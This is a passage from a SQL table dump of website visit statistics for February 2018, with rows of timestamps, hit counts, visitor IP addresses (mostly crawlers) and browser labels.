6.149.67','other'),(211667,1519277424,1,1,0,0,'141.8.142.74','other'),(211668,1519277602,1,1,0,0,'54.36.148.43','other'),(211669,1519278045,1,0,1,0,'66.249.66.157',''),(211670,1519278113,1,1,0,0,'66.249.66.156','chrome'),(211671,1519278502,1,1,0,0,'54.36.149.50','other'),(211672,1519278922,1,1,0,0,'54.36.148.50','other'),(211673,1519278991,2,2,0,0,'141.8.142.74','other'),(211674,1519279014,1,1,0,0,'91.197.19.200','firefox'),(211675,1519280012,1,1,0,0,'52.201.107.155','other'),(211676,1519280051,1,1,0,0,'54.36.148.146','other'),(211677,1519280330,1,1,0,0,'91.196.178.6','chrome'),(211678,1519280351,1,1,0,0,'141.8.142.74','other'),(211679,1519280467,1,1,0,0,'54.36.148.74','other'),(211680,1519280758,1,1,0,0,'91.196.177.46','chrome'),(211681,1519280830,1,1,0,0,'54.36.149.45','other'),(211682,1519280973,1,1,0,0,'54.36.148.189','other'),(211683,1519281078,1,1,0,0,'54.36.148.141','other'),(211684,1519281160,5,5,0,0,'91.196.178.80','chrome'),(211685,1519281313,1,1,0,0,'217.69.133.18','other'),(211686,1519281813,25,25,0,0,'54.90.119.59','other'),(211687,1519281906,1,1,0,0,'54.36.148.45','other'),(211688,1519282088,1,1,0,0,'54.36.149.106','other'),(211689,1519282202,1,1,0,0,'54.36.149.39','other'),(211690,1519282506,1,1,0,0,'54.36.148.218','other'),(211691,1519282552,1,1,0,0,'54.36.148.134','other'),(211692,1519282721,49,49,0,0,'54.90.119.59','other'),(211693,1519282902,1,1,0,0,'178.154.171.88','other'),(211694,1519282918,1,1,0,0,'54.36.148.236','other'),(211695,1519283179,2,2,0,0,'91.196.178.80','chrome'),(211696,1519283253,1,1,0,0,'54.36.148.231','other'),(211697,1519283624,7,7,0,0,'54.90.119.59','other'),(211698,1519283855,1,1,0,0,'54.36.149.99','other'),(211699,1519283979,1,1,0,0,'8.29.198.26','other'),(211700,1519284177,1,1,0,0,'54.36.148.91','other'),(211701,1519284178,1,1,0,0,'54.36.148.42','other'),(211702,1519284190,1,0,1,0,'66.249.66.157',''),(211703,1519284340,1,1,0,0,'54.36.148.85','other'),(211704,1519284426,1,1,0,0,'89.162.132.82','chrome'),(211705,1519284485,1,1,0,0,'54.36.149.33','other'),(211706,1519284584,1,1,0,0,'54.36.148.174','other'),(211707,1519284674,3,3,0,0,'141.8.142.74','other'),(211708,1519284736,1,1,0,0,'5.3.170.216','chrome'),(211709,1519284825,1,1,0,0,'54.36.149.66','other'),(211710,1519284917,1,1,0,0,'198.211.121.79','chrome'),(211711,1519284934,1,1,0,0,'54.36.148.119','other'),(211712,1519284990,5,5,0,0,'91.196.178.80','chrome'),(211713,1519285209,1,1,0,0,'54.36.148.253','other'),(211714,1519285377,1,1,0,0,'54.36.148.187','other'),(211715,1519285423,1,1,0,0,'54.36.148.136','other'),(211716,1519285563,1,1,0,0,'54.36.148.172','other'),(211717,1519285809,68,68,0,0,'5.9.61.111','other'),(211718,1519286021,1,1,0,0,'54.36.148.107','other'),(211719,1519286308,2,2,0,0,'141.8.142.74','other'),(211720,1519286443,1,1,0,0,'54.36.148.116','other'),(211721,1519286444,1,1,0,0,'46.201.134.15','firefox'),(211722,1519286591,1,1,0,0,'54.36.148.170','other'),(211723,1519286625,2,2,0,0,'91.196.178.88','chrome'),(211724,1519286954,1,1,0,0,'54.36.148.121','other'),(211725,1519287627,1,1,0,0,'54.36.148.181','other'),(211726,1519287759,2,2,0,0,'195.230.119.34','chrome'),(211727,1519288024,4,4,0,0,'91.196.178.80','chrome'),(211728,1519288080,1,1,0,0,'54.36.148.54','other'),(211729,1519288156,1,1,0,0,'46.211.6.249','chrome'),(211730,1519288236,1,1,0,0,'95.132.25.50','chrome'),(211731,1519288265,1,1,0,0,'54.36.148.67','other'),(211732,1519288621,1,1,0,0,'54.36.149.93','other'),(211733,1519288784,1,1,0,0,'54.36.148.72','other'),(211734,1519288795,1,1,0,0,'157.55.39.141','other'),(211735,1519288960,1,1,0,0,'37.52.16.11','chrome'),(211736,1519289026,1,1,0,0,'91.196.177.129','chrome'),(211737,1519289077,1,1,0,0,'217.69.133.230','other'),(211738,1519289146,1,1,0,0,'54.36.148.172','other'),(211739,1519289362,1,1,0,0,'178.154.171.88','other'),(211740,1519289465,1,1,0,0,'31.148.255.17','chrome'),(211741,1519289475,11,11,0,0,'23.237.4.26','other'),(211742,1519289503,2,2,0,0,'91.196.178.166','chrome'),(211743,1519289665,1,1,0,0,'54.36.149.103','other'),(211744,1519289839,1,1,0,0,'46.219.238.228','chrome'),(211745,1519290008,1,1,0,0,'54.36.149.76','other'),(211746,1519290057,1,1,0,0,'54.36.148.191','other'),(211747,1519290230,1,1,0,0,'91.196.177.15','chrome'),(211748,1519290378,1,1,0,0,'141.8.142.74','other'),(211749,1519290525,2,2,0,0,'91.196.178.88','firefox'),(211750,1519290584,1,1,0,0,'37.55.135.67','chrome'),(211751,1519290712,2,2,0,0,'54.36.149.106','other'),(211752,1519290783,1,1,0,0,'91.196.178.104','chrome'),(211753,1519290856,1,1,0,0,'149.154.167.161','other'),(211754,1519291209,1,1,0,0,'54.36.149.74','other'),(211755,1519291219,1,1,0,0,'54.36.148.70','other'),(211756,1519291237,1,1,0,0,'54.36.148.169','other'),(211757,1519291556,1,1,0,0,'54.36.148.26','other'),(211758,1519291851,1,1,0,0,'31.148.255.17','chrome'),(211759,1519291860,1,1,0,0,'66.249.66.156','chrome'),(211760,1519292052,1,1,0,0,'141.8.132.19','other'),(211761,1519292211,1,1,0,0,'40.77.167.149','other'),(211762,1519292287,2,2,0,0,'198.211.121.79','chrome'),(211763,1519292328,1,1,0,0,'107.167.106.220','other'),(211764,1519293106,1,1,0,0,'54.36.149.44','other'),(211765,1519293179,1,1,0,0,'54.36.148.93','other'),(211766,1519293183,1,1,0,0,'54.36.149.107','other'),(211767,1519293768,1,1,0,0,'54.36.148.87','other'),(211768,1519294089,1,1,0,0,'5.228.24.162','chrome'),(211769,1519294091,1,1,0,0,'91.196.177.15','chrome'),(211770,1519294203,1,1,0,0,'93.72.4.209','chrome'),(211771,1519294748,1,1,0,0,'213.180.203.8','other'),(211772,1519294809,1,1,0,0,'8.29.198.25','other'),(211773,1519295376,1,1,0,0,'54.36.149.46','other'),(211774,1519295647,1,0,1,0,'66.249.66.155',''),(211775,1519295834,1,1,0,0,'54.36.148.25','other'),(211776,1519296158,3,3,0,0,'91.196.178.80','chrome'),(211777,1519296194,1,1,0,0,'54.36.148.135','other'),(211778,1519296427,1,1,0,0,'54.36.148.185','other'),(211779,1519296607,1,1,0,0,'178.92.75.163','chrome'),(211780,1519296644,1,1,0,0,'54.36.148.48','other'),(211781,1519297095,1,1,0,0,'54.36.148.101','other'),(211782,1519297202,1,1,0,0,'54.36.149.63','other'),(211783,1519297227,1,1,0,0,'54.36.149.21','other'),(211784,1519297279,2,2,0,0,'46.211.127.151','chrome'),(211785,1519297323,1,1,0,0,'5.45.207.58','other'),(211786,1519297419,1,1,0,0,'52.201.107.155','other'),(211787,1519297551,1,1,0,0,'54.36.149.3','other'),(211788,1519297585,1,1,0,0,'54.36.148.199','other'),(211789,1519297692,1,1,0,0,'54.36.148.15','other'),(211790,1519297731,1,1,0,0,'54.36.148.244','other'),(211791,1519297747,2,2,0,0,'54.36.148.183','other'),(211792,1519297790,1,1,0,0,'54.36.149.53','other'),(211793,1519297820,1,1,0,0,'46.174.125.28','chrome'),(211794,1519298244,2,2,0,0,'91.196.178.164','chrome'),(211795,1519298302,1,1,0,0,'54.36.148.60','other'),(211796,1519298349,1,1,0,0,'52.201.107.155','other'),(211797,1519298370,1,1,0,0,'54.36.148.236','other'),(211798,1519298402,1,1,0,0,'54.36.148.27','other'),(211799,1519298542,1,1,0,0,'185.182.81.47','chrome'),(211800,1519298742,1,1,0,0,'54.36.148.114','other'),(211801,1519299251,1,1,0,0,'52.201.107.155','other'),(211802,1519299582,3,3,0,0,'91.196.178.166','chrome'),(211803,1519299843,1,1,0,0,'54.36.148.63','other'),(211804,1519299933,1,1,0,0,'54.36.149.8','other'),(211805,1519300083,1,1,0,0,'54.36.148.24','other'),(211806,1519300387,1,1,0,0,'54.36.149.57','other'),(211807,1519301062,1,1,0,0,'178.154.200.7','other'),(211808,1519301071,1,1,0,0,'178.92.75.163','chrome'),(211809,1519301214,1,1,0,0,'178.154.171.60','other'),(211810,1519301454,1,1,0,0,'54.36.148.131','other'),(211811,1519301561,1,1,0,0,'54.36.148.240','other'),(211812,1519301773,1,1,0,0,'54.36.148.121','other'),(211813,1519302004,1,1,0,0,'54.36.148.242','other'),(211814,1519302498,1,1,0,0,'66.249.66.157','chrome'),(211815,1519302518,1,1,0,0,'66.249.66.155','chrome'),(211816,1519302586,1,1,0,0,'54.36.148.57','other'),(211817,1519302747,1,1,0,0,'178.154.171.81','other'),(211818,1519302806,1,1,0,0,'178.92.75.163','chrome'),(211819,1519302866,1,1,0,0,'54.36.148.18','other'),(211820,1519303125,4,4,0,0,'91.196.178.80','chrome'),(211821,1519303357,1,1,0,0,'54.36.148.64','other'),(211822,1519303978,1,1,0,0,'92.112.47.83','chrome'),(211823,1519304507,1,1,0,0,'54.36.148.208','other'),(211824,1519304597,1,1,0,0,'54.36.148.104','other'),(211825,1519304983,1,1,0,0,'54.36.149.0','other'),(211826,1519305606,2,2,0,0,'91.196.178.80','chrome'),(211827,1519305636,1,1,0,0,'8.29.198.26','other'),(211828,1519306030,1,1,0,0,'213.180.203.8','other'),(211829,1519306070,2,2,0,0,'46.174.163.134','chrome'),(211830,1519306291,1,1,0,0,'91.196.178.37','chrome'),(211831,1519306606,1,1,0,0,'37.9.113.134','other'),(211832,1519306977,1,1,0,0,'95.132.21.112','firefox'),(211833,1519307052,2,2,0,0,'91.196.178.80','chrome'),(211834,1519307173,1,1,0,0,'176.120.99.194','firefox'),(211835,1519307461,1,1,0,0,'87.250.224.46','other'),(211836,1519307487,1,1,0,0,'178.154.171.88','other'),(211837,1519307790,2,2,0,0,'91.196.178.88','chrome'),(211838,1519307986,4,4,0,0,'91.196.178.80','chrome'),(211839,1519308259,1,1,0,0,'66.249.66.157','chrome'),(211840,1519308288,1,0,1,0,'66.249.66.76',''),(211841,1519309317,1,1,0,0,'178.154.171.88','other'),(211842,1519309347,1,1,0,0,'54.36.148.14','other'),(211843,1519309411,1,1,0,0,'54.36.148.13','other'),(211844,1519309559,1,1,0,0,'54.36.149.37','other'),(211845,1519309576,1,1,0,0,'95.134.97.244','firefox'),(211846,1519309736,1,1,0,0,'54.36.148.197','other'),(211847,1519310345,1,1,0,0,'178.154.171.60','other'),(211848,1519310939,1,1,0,0,'54.36.148.255','other'),(211849,1519311149,1,1,0,0,'54.36.148.52','other'),(211850,1519311418,1,1,0,0,'54.36.148.11','other'),(211851,1519312354,1,1,0,0,'91.196.177.46','chrome'),(211852,1519312394,1,1,0,0,'54.36.149.66','other'),(211853,1519312569,2,2,0,0,'91.196.178.88','chrome'),(211854,1519312578,1,1,0,0,'37.55.22.85','chrome'),(211855,1519313017,1,0,1,0,'66.249.66.157',''),(211856,1519313313,1,1,0,0,'54.36.148.79','other'),(211857,1519313463,1,1,0,0,'54.36.149.69','other'),(211858,1519313627,1,1,0,0,'54.36.149.40','other'),(211859,1519313847,1,1,0,0,'54.36.148.167','other'),(211860,1519313902,1,1,0,0,'54.36.148.23','other'),(211861,1519314102,1,1,0,0,'54.36.148.189','other'),(211862,1519314117,1,1,0,0,'54.36.148.118','other'),(211863,1519314703,1,1,0,0,'54.36.148.28','other'),(211864,1519314761,1,1,0,0,'37.73.206.5','chrome'),(211865,1519314826,1,1,0,0,'54.36.149.81','other'),(211866,1519314949,1,1,0,0,'180.76.15.5','other'),(211867,1519315022,1,1,0,0,'54.36.149.41','other'),(211868,1519315033,1,1,0,0,'54.36.148.73','other'),(211869,1519315798,1,1,0,0,'54.36.148.51','other'),(211870,1519315869,1,1,0,0,'188.255.91.224','msie'),(211871,1519316039,1,1,0,0,'54.36.148.177','other'),(211872,1519316476,1,1,0,0,'8.29.198.27','other'),(211873,1519316480,1,1,0,0,'54.36.148.110','other'),(211874,1519316536,1,1,0,0,'54.36.149.29','other'),(211875,1519316582,1,1,0,0,'54.36.148.222','other'),(211876,1519316763,1,1,0,0,'54.36.148.84','other'),(211877,1519316775,1,1,0,0,'40.77.167.23','other'),(211878,1519316918,1,1,0,0,'54.36.148.121','other'),(211879,1519316995,1,1,0,0,'54.36.148.151','other'),(211880,1519317024,1,1,0,0,'54.36.148.141','other'),(211881,1519317327,1,1,0,0,'54.36.149.56','other'),(211882,1519317611,1,1,0,0,'54.36.148.13','other'),(211883,1519317742,1,1,0,0,'40.77.167.23','other'),(211884,1519317889,1,1,0,0,'194.213.23.42','firefox'),(211885,1519317996,1,1,0,0,'54.36.148.254','other'),(211886,1519318324,1,1,0,0,'188.230.43.254','other'),(211887,1519318384,1,1,0,0,'54.36.149.60','other'),(211888,1519318924,3,3,0,0,'92.113.188.43','chrome'),(211889,1519319170,1,1,0,0,'54.36.148.67','other'),(211890,1519319203,1,1,0,0,'54.36.148.17','other'),(211891,1519319358,1,1,0,0,'54.36.148.49','other'),(211892,1519319762,1,1,0,0,'54.36.148.199','other'),(211893,1519319899,1,1,0,0,'91.196.178.73','firefox'),(211894,1519320017,1,1,0,0,'54.36.149.77','other'),(211895,1519320580,1,1,0,0,'54.36.148.110','other'),(211896,1519320689,1,1,0,0,'188.230.43.254','other'),(211897,1519321168,1,1,0,0,'54.36.148.208','other'),(211898,1519321346,1,1,0,0,'54.36.148.10','other'),(211899,1519321395,1,1,0,0,'54.36.148.65','other'),(211900,1519321396,1,1,0,0,'54.36.148.93','other'),(211901,1519321645,1,1,0,0,'54.36.148.148','other'),(211902,1519321815,1,1,0,0,'54.36.149.31','other'),(211903,1519321818,1,1,0,0,'193.194.127.222','firefox'),(211904,1519322300,1,1,0,0,'54.36.148.25','other'),(211905,1519322435,1,1,0,0,'54.36.148.70','other'),(211906,1519322518,1,1,0,0,'188.230.43.254','other'),(211907,1519322626,1,1,0,0,'91.196.178.134','chrome'),(211908,1519323252,1,1,0,0,'54.36.148.12','other'),(211909,1519323529,1,1,0,0,'54.36.148.155','other'),(211910,1519323812,2,2,0,0,'54.36.148.242','other'),(211911,1519324096,1,1,0,0,'54.36.149.92','other'),(211912,1519324646,1,1,0,0,'54.36.148.98','other'),(211913,1519325115,1,1,0,0,'91.196.178.59','chrome'),(211914,1519325133,1,1,0,0,'54.36.149.71','other'),(211915,1519325205,1,1,0,0,'54.36.148.227','other'),(211916,1519325636,2,2,0,0,'185.30.202.116','chrome'),(211917,1519325656,1,1,0,0,'162.210.196.97','other'),(211918,1519325857,1,1,0,0,'91.196.178.134','chrome'),(211919,1519325865,1,1,0,0,'54.36.149.66','other'),(211920,1519325974,1,1,0,0,'54.36.149.85','other'),(211921,1519327314,1,1,0,0,'8.29.198.26','other'),(211922,1519328547,1,0,1,0,'66.249.66.157',''),(211923,1519328563,1,0,1,0,'66.249.66.76',''),(211924,1519328916,1,1,0,0,'178.154.171.88','other'),(211925,1519328917,1,1,0,0,'141.8.142.74','other'),(211926,1519329991,1,1,0,0,'178.154.171.88','other'),(211927,1519331358,1,1,0,0,'77.111.244.47','chrome'),(211928,1519331487,1,1,0,0,'54.36.149.59','other'),(211929,1519331501,1,1,0,0,'54.36.149.82','other'),(211930,1519331521,1,1,0,0,'54.36.149.24','other'),(211931,1519331605,1,1,0,0,'54.36.148.216','other'),(211932,1519331794,1,1,0,0,'54.36.148.173','other'),(211933,1519331871,1,1,0,0,'54.36.149.33','other'),(211934,1519331997,1,1,0,0,'54.36.149.43','other'),(211935,1519332123,1,1,0,0,'54.36.149.10','other'),(211936,1519332208,1,1,0,0,'54.36.149.107','other'),(211937,1519332266,1,1,0,0,'54.36.148.119','other'),(211938,1519332420,1,1,0,0,'54.36.149.50','other'),(211939,1519332588,1,1,0,0,'54.36.148.143','other'),(211940,1519332850,1,1,0,0,'91.216.3.73','firefox'),(211941,1519332882,1,1,0,0,'54.36.148.133','other'),(211942,1519333037,1,1,0,0,'54.36.149.38','other'),(211943,1519333132,1,1,0,0,'54.36.148.151','other'),(211944,1519333292,1,1,0,0,'54.36.148.45','other'),(211945,1519333355,1,1,0,0,'40.77.167.123','other'),(211946,1519333376,1,1,0,0,'54.36.148.175','other'),(211947,1519333546,1,1,0,0,'54.36.148.48','other'),(211948,1519333688,1,1,0,0,'54.36.148.198','other'),(211949,1519333880,1,1,0,0,'40.77.167.149','other'),(211950,1519334361,1,1,0,0,'54.36.149.94','other'),(211951,1519334984,8,8,0,0,'62.210.101.101','other'),(211952,1519335562,1,0,1,0,'66.249.73.89',''),(211953,1519335576,1,1,0,0,'54.36.148.20','other'),(211954,1519335591,1,1,0,0,'54.36.148.156','other'),(211955,1519335730,1,0,1,0,'66.249.73.91',''),(211956,1519335854,1,1,0,0,'54.36.148.197','other'),(211957,1519335878,1,1,0,0,'180.76.15.27','other'),(211958,1519335952,1,1,0,0,'54.36.148.117','other'),(211959,1519336612,1,1,0,0,'54.36.148.248','other'),(211960,1519336893,1,1,0,0,'40.77.167.149','other'),(211961,1519337105,1,1,0,0,'54.36.148.47','other'),(211962,1519337633,1,1,0,0,'54.36.148.51','other'),(211963,1519337652,1,1,0,0,'54.36.148.216','other'),(211964,1519337665,1,1,0,0,'54.36.148.32','other'),(211965,1519337867,1,1,0,0,'54.36.148.139','other'),(211966,1519338146,1,1,0,0,'8.29.198.26','other'),(211967,1519338432,1,1,0,0,'54.36.148.219','other'),(211968,1519338847,1,1,0,0,'54.36.149.10','other'),(211969,1519339616,1,1,0,0,'54.36.148.186','other'),(211970,1519339635,1,1,0,0,'54.36.148.165','other'),(211971,1519339757,1,1,0,0,'54.36.149.23','other'),(211972,1519339840,1,1,0,0,'141.8.142.74','other'),(211973,1519339874,1,0,1,0,'66.249.73.67',''),(211974,1519341239,1,1,0,0,'141.8.142.74','other'),(211975,1519342275,1,1,0,0,'54.36.148.106','other'),(211976,1519342565,1,1,0,0,'54.36.149.16','other'),(211977,1519342587,1,1,0,0,'54.36.149.23','other'),(211978,1519342679,1,1,0,0,'54.36.149.65','other'),(211979,1519342709,1,1,0,0,'66.249.73.93','chrome'),(211980,1519342748,1,1,0,0,'87.250.224.46','other'),(211981,1519342987,1,1,0,0,'66.249.73.67','chrome'),(211982,1519343036,1,1,0,0,'54.36.148.118','other'),(211983,1519343063,1,1,0,0,'54.36.149.31','other'),(211984,1519343078,1,1,0,0,'54.36.149.47','other'),(211985,1519343079,1,1,0,0,'54.36.148.232','other'),(211986,1519343675,1,1,0,0,'54.36.149.86','other'),(211987,1519343754,1,1,0,0,'54.36.148.45','other'),(211988,1519343889,1,1,0,0,'54.36.149.50','other'),(211989,1519344227,2,2,0,0,'178.154.171.88','other'),(211990,1519344328,1,1,0,0,'54.36.148.66','other'),(211991,1519344413,1,1,0,0,'54.36.148.177','other'),(211992,1519345038,1,1,0,0,'54.36.148.142','other'),(211993,1519345458,2,2,0,0,'141.8.142.74','other'),(211994,1519345917,2,2,0,0,'178.154.171.88','other'),(211995,1519346592,1,1,0,0,'54.36.148.187','other'),(211996,1519346910,1,1,0,0,'54.236.8.60','other'),(211997,1519347098,1,1,0,0,'66.249.73.67','chrome'),(211998,1519347372,2,2,0,0,'141.8.142.74','other'),(211999,1519347591,1,1,0,0,'54.36.148.138','other'),(212000,1519347697,1,1,0,0,'54.36.149.89','other'),(212001,1519347828,1,1,0,0,'54.236.8.60','other'),(212002,1519347880,1,1,0,0,'54.36.148.252','other'),(212003,1519347987,1,1,0,0,'87.250.224.46','other'),(212004,1519348099,1,1,0,0,'54.36.148.215','other'),(212005,1519348259,1,1,0,0,'180.76.15.142','other'),(212006,1519348400,1,1,0,0,'54.36.149.64','other'),(212007,1519348750,1,1,0,0,'54.236.8.60','other'),(212008,1519348986,1,1,0,0,'8.29.198.27','other'),(212009,1519349455,1,1,0,0,'54.36.148.39','other'),(212010,1519349668,1,1,0,0,'54.236.8.60','other'),(212011,1519349845,1,1,0,0,'66.249.73.73','chrome'),(212012,1519349866,1,0,1,0,'66.249.73.71',''),(212013,1519349877,1,1,0,0,'66.249.73.67','chrome'),(212014,1519349897,1,0,1,0,'66.249.73.91',''),(212015,1519349903,1,1,0,0,'54.36.148.205','other'),(212016,1519350003,1,1,0,0,'54.36.149.19','other'),(212017,1519350171,1,1,0,0,'54.36.148.46','other'),(212018,1519350587,1,1,0,0,'54.236.8.60','other'),(212019,1519350717,1,1,0,0,'54.36.148.51','other'),(212020,1519351149,1,1,0,0,'54.36.148.182','other'),(212021,1519351471,1,1,0,0,'54.36.148.96','other'),(212022,1519351491,1,1,0,0,'54.236.8.60','other'),(212023,1519352419,1,1,0,0,'54.236.8.60','other'),(212024,1519353328,1,1,0,0,'54.236.8.60','other'),(212025,1519354259,1,1,0,0,'54.236.8.60','other'),(212026,1519354369,1,0,1,0,'66.249.73.71',''),(212027,1519354371,1,1,0,0,'54.36.148.89','other'),(212028,1519354590,1,1,0,0,'54.36.148.213','other'),(212029,1519354802,1,1,0,0,'178.154.171.88','other'),(212030,1519355078,1,1,0,0,'54.36.148.175','other'),(212031,1519355189,1,1,0,0,'54.236.8.60','other'),(212032,1519355562,1,1,0,0,'54.36.148.215','other'),(212033,1519355752,2,2,0,0,'92.113.188.43','chrome'),(212034,1519355906,1,1,0,0,'54.36.148.40','other'),(212035,1519355977,1,1,0,0,'141.8.142.74','other'),(212036,1519356111,1,1,0,0,'54.236.8.60','other'),(212037,1519356597,1,1,0,0,'54.36.148.154','other'),(212038,1519356761,1,1,0,0,'54.36.148.134','other'),(212039,1519356932,1,1,0,0,'54.36.149.22','other'),(212040,1519357023,1,1,0,0,'54.236.8.60','other'),(212041,1519357032,1,1,0,0,'54.36.148.206','other'),(212042,1519357120,1,1,0,0,'54.36.148.122','other'),(212043,1519357457,1,0,1,0,'66.249.73.89',''),(212044,1519357722,1,1,0,0,'54.36.149.59','other'),(212045,1519357808,1,1,0,0,'54.36.149.92','other'),(212046,1519357936,1,1,0,0,'54.236.8.60','other'),(212047,1519358642,1,1,0,0,'141.8.142.74','other'),(212048,1519358720,1,1,0,0,'54.36.148.203','other'),(212049,1519358843,1,1,0,0,'54.236.8.60','other'),(212050,1519358977,1,1,0,0,'54.36.148.83','other'),(212051,1519359101,1,1,0,0,'54.36.148.248','other'),(212052,1519359197,1,1,0,0,'54.36.148.135','other'),(212053,1519359429,1,1,0,0,'109.173.61.189','chrome'),(212054,1519359765,1,1,0,0,'54.236.8.60','other'),(212055,1519359814,1,1,0,0,'8.29.198.25','other'),(212056,1519360160,1,1,0,0,'54.36.149.42','other'),(212057,1519360189,1,1,0,0,'54.36.148.237','other'),(212058,1519360392,1,1,0,0,'54.36.149.98','other'),(212059,1519360516,1,1,0,0,'141.8.142.74','other'),(212060,1519360677,1,1,0,0,'54.236.8.60','other'),(212061,1519360805,1,1,0,0,'54.36.148.217','other'),(212062,1519361019,1,1,0,0,'54.36.148.210','other'),(212063,1519361422,1,1,0,0,'54.36.148.234','other'),(212064,1519361601,1,1,0,0,'54.236.8.60','other'),(212065,1519361807,2,2,0,0,'91.121.109.55','other'),(212066,1519362145,1,1,0,0,'141.8.142.74','other'),(212067,1519362492,1,1,0,0,'144.76.8.231','other'),(212068,1519362518,1,1,0,0,'54.236.8.60','other'),(212069,1519362767,1,1,0,0,'54.36.148.255','other'),(212070,1519362807,1,1,0,0,'91.196.178.166','chrome'),(212071,1519363203,2,2,0,0,'178.154.171.88','other'),(212072,1519363419,1,1,0,0,'54.236.8.60','other'),(212073,1519363423,1,1,0,0,'54.36.149.16','other'),(212074,1519363526,1,1,0,0,'54.36.149.67','other'),(212075,1519363849,1,1,0,0,'141.8.142.74','other'),(212076,1519364068,1,1,0,0,'54.36.148.75','other'),(212077,1519364194,1,1,0,0,'54.36.149.31','other'),(212078,1519364227,1,1,0,0,'54.36.149.42','other'),(212079,1519364327,1,1,0,0,'54.236.8.60','other'),(212080,1519364439,1,1,0,0,'54.36.148.30','other'),(212081,1519365185,1,1,0,0,'54.36.149.46','other'),(212082,1519365251,1,1,0,0,'54.236.8.60','other'),(212083,1519365526,1,1,0,0,'195.54.42.25','chrome'),(212084,1519365572,2,2,0,0,'141.8.142.74','other'),(212085,1519365647,1,1,0,0,'5.9.98.178','other'),(212086,1519365863,1,1,0,0,'54.36.148.50','other'),(212087,1519366176,1,1,0,0,'91.196.178.59','chrome'),(212088,1519366179,1,1,0,0,'54.236.8.60','other'),(212089,1519366421,1,1,0,0,'54.36.148.138','other'),(212090,1519366441,1,1,0,0,'54.36.148.229','other'),(212091,1519366549,1,1,0,0,'5.9.98.178','other'),(212092,1519366991,2,2,0,0,'141.8.142.74','other'),(212093,1519367021,1,1,0,0,'54.36.148.182','other'),(212094,1519367089,1,1,0,0,'54.36.149.28','other'),(212095,1519367094,1,1,0,0,'54.236.8.60','other'),(212096,1519367452,1,1,0,0,'5.9.98.178','other'),(212097,1519367484,1,1,0,0,'54.36.149.99','other'),(212098,1519368018,1,1,0,0,'54.236.8.60','other'),(212099,1519368357,1,1,0,0,'5.9.98.178','other'),(212100,1519368483,2,2,0,0,'178.154.171.88','other'),(212101,1519368750,1,1,0,0,'54.36.148.138','other'),(212102,1519368918,1,1,0,0,'141.8.142.74','other'),(212103,1519368979,1,1,0,0,'54.236.8.60','other'),(212104,1519369181,1,1,0,0,'54.36.148.30','other'),(212105,1519369259,1,1,0,0,'5.9.98.178','other'),(212106,1519369329,1,1,0,0,'54.36.148.153','other'),(212107,1519369503,1,1,0,0,'54.36.149.107','other'),(212108,1519369844,2,2,0,0,'195.230.119.34','chrome'),(212109,1519369902,1,1,0,0,'54.236.8.60','other'),(212110,1519369971,2,2,0,0,'91.196.178.80','chrome'),(212111,1519370160,1,1,0,0,'5.9.98.178','other'),(212112,1519370590,1,1,0,0,'128.199.63.237','chrome'),(212113,1519370656,1,1,0,0,'8.29.198.25','other'),(212114,1519370829,1,1,0,0,'54.236.8.60','other'),(212115,1519371051,1,1,0,0,'91.196.178.130','chrome'),(212116,1519371058,1,1,0,0,'37.73.234.248','chrome'),(212117,1519371064,1,1,0,0,'5.9.98.178','other'),(212118,1519371150,2,2,0,0,'141.8.142.74','other'),(212119,1519371745,1,1,0,0,'54.236.8.60','other'),(212120,1519371853,2,2,0,0,'78.111.190.82','chrome'),(212121,1519371968,1,1,0,0,'5.9.98.178','other'),(212122,1519372508,1,1,0,0,'54.36.148.27','other'),(212123,1519372659,1,1,0,0,'54.236.8.60','other'),(212124,1519372869,1,1,0,0,'5.9.98.178','other'),(212125,1519372897,1,1,0,0,'141.8.142.74','other'),(212126,1519373050,1,1,0,0,'54.36.148.89','other'),(212127,1519373124,2,2,0,0,'91.196.178.80','chrome'),(212128,1519373189,1,1,0,0,'54.36.149.33','other'),(212129,1519373568,1,1,0,0,'54.236.8.60','other'),(212130,1519373791,1,1,0,0,'93.76.182.207','chrome'),(212131,1519373943,2,2,0,0,'91.196.178.65','chrome'),(212132,1519374239,2,2,0,0,'91.196.178.80','chrome'),(212133,1519374502,1,1,0,0,'54.236.8.60','other'),(212134,1519374633,4,4,0,0,'91.196.178.65','firefox'),(212135,1519374849,1,1,0,0,'95.132.28.143','firefox'),(212136,1519375010,1,1,0,0,'54.36.148.126','other'),(212137,1519375105,1,1,0,0,'54.36.149.90','other'),(212138,1519375182,1,0,1,0,'66.249.73.91',''),(212139,1519375202,1,1,0,0,'66.249.73.67','chrome'),(212140,1519375437,1,1,0,0,'54.236.8.60','other'),(212141,1519375526,1,1,0,0,'91.196.177.110','chrome'),(212142,1519375615,2,2,0,0,'91.196.178.65','firefox'),(212143,1519376358,1,1,0,0,'54.236.8.60','other'),(212144,1519376385,1,1,0,0,'178.154.171.88','other'),(212145,1519376569,1,1,0,0,'217.69.133.29','other'),(212146,1519376739,1,1,0,0,'54.36.149.71','other'),(212147,1519376777,1,1,0,0,'54.36.148.213','other'),(212148,1519377259,1,1,0,0,'54.236.8.60','other'),(212149,1519378166,1,1,0,0,'54.236.8.60','other'),(212150,1519378304,1,1,0,0,'54.36.148.215','other'),(212151,1519378399,1,1,0,0,'54.36.148.210','other'),(212152,1519378495,10,10,0,0,'69.58.178.58','other'),(212153,1519378703,1,1,0,0,'40.77.167.23','other'),(212154,1519378823,1,1,0,0,'91.196.178.166','chrome'),(212155,1519379111,1,1,0,0,'54.236.8.60','other'),(212156,1519379789,1,0,1,0,'66.249.73.67',''),(212157,1519379791,1,0,1,0,'66.249.73.93',''),(212158,1519379817,1,1,0,0,'66.249.73.89','chrome'),(212159,1519379818,2,1,1,0,'66.249.73.67',''),(212160,1519379842,1,1,0,0,'141.8.142.74','other'),(212161,1519380024,1,1,0,0,'54.236.8.60','other'),(212162,1519380032,1,1,0,0,'176.67.11.138','chrome'),(212163,1519380284,2,2,0,0,'91.196.178.65','chrome'),(212164,1519380313,1,1,0,0,'87.250.224.46','other'),(212165,1519380515,1,1,0,0,'66.249.73.73','chrome'),(212166,1519380517,1,1,0,0,'66.249.73.71','chrome'),(212167,1519380534,1,0,1,0,'66.249.73.91',''),(212168,1519380989,1,1,0,0,'54.236.8.60','other'),(212169,1519381230,1,0,1,0,'66.249.73.67',''),(212170,1519381493,1,1,0,0,'8.29.198.25','other'),(212171,1519381825,2,2,0,0,'128.199.63.237','chrome'),(212172,1519381900,1,1,0,0,'54.236.8.60','other'),(212173,1519382062,1,1,0,0,'5.45.207.82','other'),(212174,1519382138,1,1,0,0,'141.8.142.74','other'),(212175,1519382862,1,1,0,0,'54.236.8.60','other'),(212176,1519382872,1,1,0,0,'91.196.178.164','chrome'),(212177,1519382970,1,1,0,0,'